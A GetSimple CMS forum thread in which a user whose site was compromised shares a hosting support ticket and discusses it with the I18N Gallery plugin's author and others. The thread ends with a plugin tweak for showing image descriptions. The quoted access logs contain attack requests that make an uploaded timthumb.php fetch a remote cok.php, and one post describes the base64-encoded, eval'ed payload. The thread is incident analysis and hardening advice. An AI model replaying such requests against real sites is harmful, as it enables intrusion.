I18N Gallery

[devaintfire]

Nope no wordpress here, just getsimple, is it part of the plugin that resizes and crops the image?

No, it isn't.
Is /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php one of the directories/files having been created?

Yeah it is, so I am guessing that they are suggesting that the illegally uploaded directory contains the exploited script, a paradox!

So here's what they've said

"The xo folder was pulled in from an external source which included timthumb.php rather than your site running Wordpress. The method the attackers achieved this via script injection;"

[mvlcek]

Yeah it is, so I am guessing that they are suggesting that the illegally uploaded directory contains the exploited script, a paradox!

They upload a (buggy or hampered with) script, which, when called with a php script (cok.php) as a parameter executes the returned faux gif, which in reality is a php script that contains all code as a base64 encoded slightly obscured zipped string which is eval'ed and creates - among other actions I did not analyze - C files from base64 encoded strings, ..., and returns a HTML page with lots of security relevant information.

But this does not explain, how the directories/files were created.

[devaintfire]

They upload a (buggy or hampered with) script, which, when called with a php script (cok.php) as a parameter executes the returned faux gif, which in reality is a php script that contains all code as a base64 encoded slightly obscured zipped string which is eval'ed and creates - among other actions I did not analyze - C files from base64 encoded strings, ..., and returns a HTML page with lots of security relevant information.

Right used that tidbit to wind them up more, seems they just dont want investigate it properly?

I do appreciate all your help donation en route next week. I will keep you posted mostly because I find it all hilarious.

[Draxeiro]

Right used that tidbit to wind them up more, seems they just dont want investigate it properly?

I do appreciate all your help donation en route next week. I will keep you posted mostly because I find it all hilarious.

Maybe it is me, but I don't see where this would be hilarious. After all, they were able to do a file injection, and something did allow for that. And it is clear that vulnerability (wherever it is) would need to be solved for your site, or other GS sites for that matter if it has something to do with Get Simple or a plugin, to be safe again.

@mvclek: from the looks of it you're analyzing what happened. Did they do it via your plugin or via another way?

[mvlcek]

@mvclek: from the looks of it you're analyzing what happened. Did they do it via your plugin or via another way?

All the log entries sent by devaintfire show calls to files that should not be there, i.e. have been uploaded by means unknown. One of these files is a PHP file allowing script injection, but this does not mean that that file itself was uploaded by script injection.

To properly analyze this, the log entries before the access to the uploaded directories/files would be needed.
I suggest to move this to a separate topic, as with the information received so far the problem could be anywhere including the hoster's infrastructure (suggesting to turn allow_url_include off does not indicate a really safe infrastructure as this should be turned off by default).

[devaintfire]

They still insist that there's a script somewhere which allowed timthumb.php etc to uploaded and that that script is in the plugin.

It's hilarious because I've had 3 hours sleep in 2 days, they have me clean insatll the site, locked me out of the control panel for a bit, and seem to be being deliberately obstinate, I know it's important because it's a serious security problem, and if it were part of GetSimple or the plug in I'd be concerned, I use both, and enjoy using both, I don't want to have to go back to using MySQL etc, or something heavy duty like wordpress.

I love GetSimple, I recommend it to people! And this flaw (whatever the cause) damages not only the sites rep, but mine too!

I have to laugh or I might bite my knuckle off....

[devaintfire]

Here's their latest effort :

"The timthumb script was pulled in after access had already been breached due to the compromised script which is the reason for the xo folder existing. A GET command (a type of http request) was then used to transfer data into your webspace;

GET /xo/ix-xyz-graph-paper//wp-content/themes/widescreen/includes/timthumb.php?

The issue here is once the site is compromised and the hacker has control any number of files can be modified so the real issue is the compromise itself rather than what was done after. This appears to be the gallery plugin used by your site and I recommend updating the plugin from a known clean source such as the developers site to prevent this happening in the future."

[mvlcek]

"The issue here is once the site is compromised and the hacker has control any number of files can be modified so the real issue is the compromise itself rather than what was done after."

Yes, exactly, but we would need evidence of WHAT was done BEFORE, log entries of the requests that CAUSED the problem.

"This appears to be the gallery plugin used by your site and I recommend updating the plugin from a known clean source such as the developers site to prevent this happening in the future."

So far I have not seen anything either pointing to GetSimple or any of the plugins used.
Updating won't help if there is a security hole in either of them. And if there isn't it does not explain how the files could be uploaded.

[Draxeiro]

@devaintfire:
Ie. Be sure to get that information and those log files from them.

And at the same time get them to spill the info WHY they think the gallery would be the cause.

[Zegnåt]

Here’s their latest effort:

Blablabla. A GET command for timthumb.php. Stuff we know about hackers. More accusation against I18N Gallery.

A feeble effort at that. Please reply to them something along the lines of:

I know a GET request was made for timthumb.php, that’s not what I need to know. What I would like to know is how that file got there in the first place. You’ve constantly been pointing at the gallery plugin without clarifying yourself.

The version of the gallery plugin that I am using comes straight from ‘a known clean source’. Are there any POST or GET requests to the gallery plugin that show it was the origin of the script injection? If there are, could you share these with me so I can forward them to the plugin author? I have shared the GET requests you have been sharing with me but these only show how timthumb.php has been used and not where the injection has originated.

If there are no POST or GET requests that could have been responsible for putting timthumb.php on my server why do you think the gallery plugin is the problem? If you have found any code inside the plugin that you think could be the culprit would you mind telling me what this code is and your reasoning behind it?

[devaintfire]

Done that, lets see what they say!

[devaintfire]

Before we get the rubbish answer Heart Internet use to fob me off again! Heres the full converstaion I have had with them so far.....

"Ticket Number:

1203300067

Ticket Created:

20:06 30/03/2012

Ticket Updated:

11:24 01/04/2012

Service:

rcosstickphoto.com

Summary:

Unauthorised access

Status:

OPEN

UpdatedAt 20:06 30/03/2012, you changed the ticket status to OPEN and wrote:

As detailed by the error log someone had managed to upload two folders to my webspace, xo and it both unauthorized, how has this happened? I have now deleted said folders, but needless to say I am furious.

UpdatedAt 20:15 30/03/2012, you wrote:

Needless to say I deleted the files, checked my permissions and changed the password. I wish to change the password for my customer account also.

UpdatedAt 20:23 30/03/2012, you wrote:

I have now changed my account password as well, there should be some compensation for this. I recommend your service often to my clients, and have server sites hosted with you, if you cannot offer some sort of proper reckon-pence for this I will stop recommending you in future.

UpdatedAt 20:35 30/03/2012, Joe Swaby changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for contacting us. Checking the logs and the files, it looks as though this was actually down to the gallery plugin that you had on your site being compromise. There is nothing showing in the FTP logs in relation to these folders being created and uploaded, therefore it would seem that this as said, was down to the script being compromise. I would recommend that you investigate this gallery and ensure that this is running the most up to date version to ensure any security or exploits in this code are resolved.

If you have a known clean backup of the site, I would suggest that this is uploaded to your pacakge, as it could be that once this script has been hacked and tampered with, slight changes would have been made to leave this open for possible returns. You might be better to remove and re-install this script and gallery in regards to ensuring the files.

Best Wishes,
Joe Swaby
Heart Internet

You rated this response: Very poor

UpdatedAt 20:37 30/03/2012, you changed the ticket status to OPEN and wrote:

What IP did the upload come from?

UpdatedAt 21:00 30/03/2012, Joe Swaby changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for your response. Checking the FTP logs don't actually show as this directory being created or uploaded through this. As such, it would not imply that this has been uploaded through this manor. With the FTP lock that we impose on packages, this is to help ensure that a brute force attack on an account wouldn't yield any results.

I would advise, as saying, if possible uploading a clean copy of your plugins for the site, as it could be that a back door was exploited in any one of these. Without knowing the code and lots of details in regards to the scripts, isolating and resolving where this has been compromised would be near impossible.

Best Wishes,
Joe Swaby
Heart Internet

You rated this response: Very poor

UpdatedAt 23:08 30/03/2012, you changed the ticket status to OPEN and wrote:

I appreciate that that's your response I asked if you could tell me what IP used the exploit?
I have a total of 7 accounts that use your service and 4 more pending this year, I would hate to have to move them all because you didn't read my support ticket properly.

UpdatedAt 23:09 30/03/2012, you wrote:

I want to know so I can barr the IP

UpdatedAt 23:19 30/03/2012, Stephen Saidani changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for contacting us.

I have a read through your ticket and had a look through your site. The information you are requesting is as follows.


rcosstickphoto.com-access_log.7.gz:rcosstickphoto.com 207.255.175.25 - - [05/Mar/2012:20:49:33 +0000] "GET /it/nc-peace-sign-free-needlepoint/ HTTP/1.1" 200 809 "http://www.google.com/imgres?q=perler+bead+peace+patterns&start=179&um=1&hl=en&biw=1600&bih=666&addh=36&tbm=isch&tbnid= hH5RVBXilR1U1M:&imgrefurl=http://rcosstickphoto.com/it/nc-peace-sign-free-needlepoint/&docid=l2YHtCH1gM0w6M&imgurl=http:/ /0.tqn.com/d/crossstitch/1/0/b/q/-/-/peacesign.jpg&w=972&h=999&ei=oyZVT9aWMYGx0AHG5rz_Dw&zoom=1&iact=rc&dur=78&sig=115058 349598720292892&page=7&tbnh=146&tbnw=142&ndsp=31&ved=1t:429,r:20,s:179&tx=198&ty=-3" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.3; SearchToolbar 1.2; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; AskTbGAM1/5.12.2.16749)"
rcosstickphoto.com-access_log.7.gz:rcosstickphoto.com 207.255.175.25 - - [05/Mar/2012:20:49:58 +0000] "GET /it/nc-peace-sign-free-needlepoint/ HTTP/1.1" 200 809 "http://www.google.com/imgres?q=perler+bead+peace+patterns&start=179&um=1&hl=en&biw=1600&bih=666&addh=36&tbm=isch&tbnid= hH5RVBXilR1U1M:&imgrefurl=http://rcosstickphoto.com/it/nc-peace-sign-free-needlepoint/&docid=l2YHtCH1gM0w6M&imgurl=http:/ /0.tqn.com/d/crossstitch/1/0/b/q/-/-/peacesign.jpg&w=972&h=999&ei=oyZVT9aWMYGx0AHG5rz_Dw&zoom=1&iact=rc&dur=78&sig=115058 349598720292892&page=7&tbnh=146&tbnw=142&ndsp=31&ved=1t:429,r:20,s:179&tx=198&ty=-3" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB6.3; SearchToolbar 1.2; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; AskTbGAM1/5.12.2.16749)"

These are the logs for what appears to be the exploit on site. The IP address which has done this appears to be 207.255.175.25.

It appears that your site has been subject to an attack via a method known as script injection. Typically, this works by forcing a site to execute code when it was expecting to process another input, fake .txt files are often used for this purpose.Because script injection attacks the site code itself, it is able to completely avoid webserver security.

Subsequently we have disabled the hosting account, however FTP access is still available.

1) Firstly all files in the hosting space must be removed before we can reactivate. You can either ask us to do this for you or let us know when you have done this yourself - when we can see the hosting space is empty it will be reactivated

2) Change all passwords associated with this account. This includes FTP, eXtend, databases, mailboxes, etc. If the site connects to any external data sources - databases, rss feeds, etc. change the password there as well and modify scripts as necessary.

3) Run full virus scans (with up-to-date definitions) on any and all computers that have been used to FTP to the site.

4) Rebuild the site from scratch using the latest versions of the software used for the site from a known clean source

5) Make sure directories are only set to 755 or 711 only - do not ever use 777 permissions.

If using common CMS software as these infections commonly come via addon modules, extensions and themes, we'd suggest limiting these to only those necessary and taking care to ensure that they come from the module provider's home-site. Many of these themes/modules/extensions are available pre-infected on third-party sites.

A simple way to remove the ability for attackers to use remote file inclusion is to add a "php.ini" file at the top-level of the website with the following contents - be aware though that the web-site will need testing afterwards to ensure that no legitimate web-site scripted actions have been affected by the change.

------------------------------
The php.ini directives are...

allow_url_include = "0"
allow_url_fopen = "0"
------------------------------

Best Wishes,
Stephen Saidani
Heart Internet

You rated this response: Very poor

UpdatedAt 23:37 30/03/2012, you changed the ticket status to OPEN and wrote:

Test

UpdatedAt 23:39 30/03/2012, you wrote:

Right, I now get stuck in a session expired loop when I Itry to access extend in order to unlock the FTP in order to download the content and empty the server, I obviously dont' want you to do this for me as I know the client will have things they want to save at least locally, as I previously stated I have already changed ALL passwords associated with this account.

UpdatedAt 23:41 30/03/2012, you wrote:

I have check permission but of course will do so again, all the boxes associated with this client are Linux or Mac OS and have been checked with Sophos or ClamAV.

I am currently in discussion with the author of the plug in.

Please reactivate my access to extend so that I can access the files and empty the space. I will make a fresh install of the CMS and content.

UpdatedAt 23:48 30/03/2012, Stephen Saidani changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for contacting us.

I have allowed you FTP access and unlocked this for you. However I cannot re-activate anything else until everything on the site has been deleted.

Changing the passwords will not resolve this issue, although is recommended. The issue is actually with the holes in the code which have allowed the hacker access.

Please let me know once the files have been deleted and I will re-activate everything for you.

Best Wishes,
Stephen Saidani
Heart Internet


UpdatedAt 23:56 30/03/2012, you changed the ticket status to OPEN and wrote:

Everything in public_html has now been removed.

UpdatedAt 23:58 30/03/2012, Stephen Saidani changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for your reply.

I have now re-activated everything for you.

Best Wishes,
Stephen Saidani
Heart Internet

You rated this response: Quite poor

UpdatedAt 00:44 31/03/2012, you changed the ticket status to OPEN and wrote:

I have now done as reccomended barring the php.ini file which I am doing now, all permissions are set to 644, virus checked, updated plug ins, passwords changed, IP blocked, fresh install.

UpdatedAt 08:27 31/03/2012, Wayne Jordan changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for keeping us informed, if there is anything else we can assist you with please do not hesitate to get back to us.

Best Wishes,
Wayne Jordan
Heart Internet

You rated this response: Very poor

UpdatedAt 16:08 31/03/2012, you changed the ticket status to OPEN and wrote:

Where is the reference to this plugin in you log file? How do you think you have identified this plug in as the problem please explain this.

As far as I am the community can tell the information you provided last night has no reference to any particular part of the CMS please explain this so that it can be investigated further.

UpdatedAt 16:23 31/03/2012, Wayne Jordan changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

All of the following hits returned successful results on a script called timthumb.php

rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:08:55:49 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:09:03:33 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:20:00:32 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 64.16.220.154 - - [21/Mar/2012:23:32:02 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.nilgirisrealty.com/cok .php HTTP/1.1" 200 4984 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 64.16.220.154 - - [21/Mar/2012:23:32:03 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.nilgirisrealty.com/cok .php HTTP/1.1" 200 4735 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1"
rcosstickphoto.com-access_log.6.gz:rcosstickphoto.com 46.182.216.13 - - [10/Mar/2012:18:25:29 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.nilgirisrealty.com/cok .php HTTP/1.1" 200 4705 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

Best Wishes,
Wayne Jordan
Heart Internet

You rated this response: Very poor

UpdatedAt 16:32 31/03/2012, you changed the ticket status to OPEN and wrote:

Ok I will present this to the community and then get back to you.

UpdatedAt 17:12 31/03/2012, you wrote:

This is odd the problem is that your log here seems to indicate that I am using Wordpress, which I am most certainly not.

"rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:08:55:49 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"

I use Getsimple, here's what the plugin developer says :

"devaintfire wrote:

The php.ini directives are...

allow_url_include = "0"
allow_url_fopen = "0"
------------------------------

URL include should definitely by off by default. You should never need it.
Switching URL fopen off will disable GetSimple version/plugin update check, etc.
devaintfire wrote:

They seem pretty sure it's down to the gallery, I gave em hell last night, but if it is a problem with the gallery surely it should be sorted?

You site IS a gallery (with a contact form). So are you sure they really meant the I18N Gallery plugin or rather the site as a whole? In either case I do not see anything that could indicate something wrong with my plugin?
devaintfire wrote:

All of the following hits returned successful results on a script called timthumb.php

rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:08:55:49 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"

If I understand this log entry correctly it accesses the timthumb.php on your server. wp-content seems to indicate that you have Wordpress installed?"

As I don't use wordpress how is this the log result?

UpdatedAt 17:18 31/03/2012, you wrote:

In fact looking at that path, the script you say that's been compromised and allowed content to be uploaded to my site, is in fact inside a directory that was erroneously and with out authorization, uploaded to my site, your suggesting that the security breech is in face a paradox.

UpdatedAt 17:39 31/03/2012, James Stephens changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for the reply.

The xo folder was pulled in from an external source which included timthumb.php rather than your site running Wordpress. The method the attackers achieved this via script injection;

[10/Mar/2012:18:25:29 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/widescreen/includes/timthumb.php?

Best Wishes,
James Stephens
Heart Internet

You rated this response: Very poor

UpdatedAt 17:49 31/03/2012, you changed the ticket status to OPEN and wrote:

Yes I understand that however, my site site doesn't included timthumb.php the directories xo and it were never part of my site structure, I note that on investigation timthumb is known to be dodgy.

The question here is how did those directories get there is the first place? Which external source?

If I read you right you're saying that a script in Getsimple was used to allow someone to upload xo and it to the webspace, and in turn once timthumb was there exploited that in order to upload xo and it?

That makes no sense. My site is essentially a gallery and contact form. That's it. I don't understand how a script inside the directory which was place on the server space wrongly was used to upload said directory.

I understand script injection, I don't need you to reiterate that part of the issue.

They upload a (buggy or hampered with) script, which, when called with a php script (cok.php) as a parameter executes the returned faux gif, which in reality is a php script that contains all code as a base64 encoded slightly obscured zipped string which is eval'ed and creates - among other actions I did not analyze - C files from base64 encoded strings, ..., and returns a HTML page with lots of security relevant information.

What this doesn't explain is how the directories got there in the first place.




UpdatedAt 18:46 31/03/2012, you wrote:

The thing is it's important to know so that the community that develop GetSimple know if there a major security risk.

UpdatedAt 19:28 31/03/2012, James Stephens changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for the reply.

The timthumb script was pulled in after access had already been breached due to the compromised script which is the reason for the xo folder existing. A GET command (a type of http request) was then used to transfer data into your webspace;

GET /xo/ix-xyz-graph-paper//wp-content/themes/widescreen/includes/timthumb.php?

The issue here is once the site is compromised and the hacker has control any number of files can be modified so the real issue is the compromise itself rather than what was done after. This appears to be the gallery plugin used by your site and I recommend updating the plugin from a known clean source such as the developers site to prevent this happening in the future.

Best Wishes,
James Stephens
Heart Internet

You rated this response: Very poor

UpdatedAt 19:41 31/03/2012, you changed the ticket status to OPEN and wrote:

Have you even read the rest of this ticket, tell you what I'll stick it on my blog and then anyone can?????! Useless

UpdatedAt 20:49 31/03/2012, James Stephens changed the ticket status to CLOSE-PENDING

UpdatedAt 10:41 01/04/2012, you changed the ticket status to OPEN and wrote:

Do you think it's the gallery because timthumb.php is used for image resizing? Only the gallery I use doesnt use that, so I need some evidence to site in order to tell that it's i18n gallery.

UpdatedAt 11:10 01/04/2012, Nicholas Brown changed the ticket status to CLOSE-PENDING and wrote:

Hi Robert,

Thanks for your response.

We can only base our advice on what may have caused it on what we can see in the logfiles, which may or may not point you in the right direction. It does look as if the gallery script is the one at fault, especially as we have had lots of problems with these type of scripts, mainly because they need to be able to allow files to be uploaded to the server and then manipulated.

I would advise getting the latest versions of these files and plugins and using as much of the 2 provided php.ini directives as you can, and this should make the site secure.

Best Wishes,
Nicholas Brown
Heart Internet


UpdatedAt 11:24 01/04/2012, you changed the ticket status to OPEN and wrote:

I know a GET request was made for timthumb.php, that’s not what I need to know. What I would like to know is how that file got there in the first place. You’ve constantly been pointing at the gallery plugin without clarifying yourself.

The version of the gallery plugin that I am using comes straight from ‘a known clean source’. Are there any POST or GET requests to the gallery plugin that show it was the origin of the script injection? If there are, could you share these with me so I can forward them to the plugin author? I have shared the GET requests you have been sharing with me but these only show how timthumb.php has been used and not where the injection has originated.

If there are no POST or GET requests that could have been responsible for putting timthumb.php on my server why do you think the gallery plugin is the problem? If you have found any code inside the plugin that you think could be the culprit would you mind telling me what this code is and your reasoning behind it?"

[Connie]

timthumb is known for exploits, if an old version of that is used

the folder which is created (wp-content/) hints to wordpress, as I think the majority of timthumb implementation is done in WordPress

suggestion? Update the timthumb script. The newer versions are clean

I had a lot of trouble with that script, not only uploads of some folders, but also spam sent etc. (from WP, not GetSimple sites!)

[devaintfire]

timthumb is known for exploits, if an old version of that is used

the folder which is created (wp-content/) hints to wordpress, as I think the majority of timthumb implementation is done in WordPress

suggestion? Update the timthumb script. The newer versions are clean

I had a lot of trouble with that script, not only uploads of some folders, but also spam sent etc. (from WP, not GetSimple sites!)

But I dont use wordpress........ I dont use timthumb............ I am now actually crying....

[devaintfire]

I give up, I'm going ot close the support ticket before I put my hands in a blender.........

Here's the latest :

We are not coding trained, so we cannot analyse code to see what could have caused this, unfortunately. The script injection looks most likely to have been a small file that could have been downloaded 1 maybe 2 years ago and has lain dormant in the webspace until the malicious script author invokes it to do its dirty work. We will not have logfiles to show this, so all we can say, regrettably is to upload the latest clean versions of softeware onto the site (if your software comes from a known clean source, then that is good enough for us) and then the site should be OK.

I do feel that allowing url_fopen to be active will cause problems, as that allows malicious scripting (which usually has every way possible to download and run more malicious code in it) to open remote URLs. Is there no way for you to periodically check via the software authors website for an upgrade to the software and then download and install the update, which would stop the requirement for url_fopen to be active.

[Zegnåt]

It seems to me that they just don’t know more than ‘look, there was a GET request for timthumb.php’. All the things they have been saying about uploading the latest version was just meant as a precaution. Although they did a very crappy job of explaining this.

What they should have responded was something like the following:

We are sorry your website has been infected by a third party. Looking at your log files we see a known malicious script called timthumb has been the culprit. We cannot see how this script was uploaded to your server. Consider the following steps:

• Remove all files from your server and replace them with known clean files. It cannot be seen what files timthumb.php might have injected malicious code into so this is the safest way to clean your server of third party involvement.
  
• Install the latest version of all software you have been running. timthumb.php might have been updated not to allow for attacks like this is newer versions or the software you are using might have moved away from using timthumb.php. If timthumb.php was uploaded through some other security leak it might still be worth it to make sure you are running the latest version of everything.
  

You can also check and make sure that the option allow_url_include in your php.ini is disabled. This will block future malicious attempts to run PHP code from external servers.

We regret that your website has been infected and we would again remind you to be wary of using scripts from the internet that have not gone to a series of tests. We are doing all we can to make our servers secure but cannot keep watch over all code being uploaded.

Kind Regards,
The Management.

I hope this helps in clearing up exactly what has been going on, and what your host meant to tell you.

(Also, I should totally go into hosting.)

[devaintfire]

Thanks everyone, sorry if it was all a waste of time! But I really thought it important to raise, just in case.

[gugu]

it is solved now ?
what was the problem ?

[andyash]

How do I get image descriptions under the thumbnails?

[mvlcek]

How do I get image descriptions under the thumbnails?

Currently you can only get the image titles under the thumbnails. I added it on request but do not use it myself, as it often destroys the layout, if the title is long. Adding the description would be easy, but I don't know how you would format it to still look nice?

[andyash]

Currently you can only get the image titles under the thumbnails. I added it on request but do not use it myself, as it often destroys the layout, if the title is long. Adding the description would be easy, but I don't know how you would format it to still look nice?

Could you please let me know how to do it? I'll try to get the formatting right and if it doesn't work, I can go back to just the filenames. But I would really want to try it.

[mvlcek]

Currently you can only get the image titles under the thumbnails. I added it on request but do not use it myself, as it often destroys the layout, if the title is long. Adding the description would be easy, but I don't know how you would format it to still look nice?

Could you please let me know how to do it? I'll try to get the formatting right and if it doesn't work, I can go back to just the filenames. But I would really want to try it.

In plugins/i18n_gallery/plugin_fancybox.php and/or plugin_prettyphoto.php search for

Code:

<?php if ($showtitles) { ?>
        <p class="gallery-title"><?php echo htmlspecialchars(@$item['title']); ?></p>
<?php } ?>

and add the following line after the title:

Code:

<p class="gallery-description"><?php echo htmlspecialchars(@$item['description']); ?></p>

Thus if you switch on "Show Titles" in the gallery options you will also get the description.

[andyash]

This looks good. How can I add html tags like <br>, <em>, <b> etc. inside the description area? Currently when I try to add the tags they output as code on the page.

[mvlcek]

This looks good. How can I add html tags like <br>, <em>, <b> etc. inside the description area? Currently when I try to add the tags they output as code on the page.

If you want the description to be HTML code, you must remove the htmlspecialchars().
For prettyPhoto you must also do this some lines above the changed part, but I'm not sure if prettyPhoto will display the HTML correctly.

[andyash]

Right. On the page it looks good, but prettyphoto also breaks the text and the bottom text hides in the frame.
Thanks a ton though.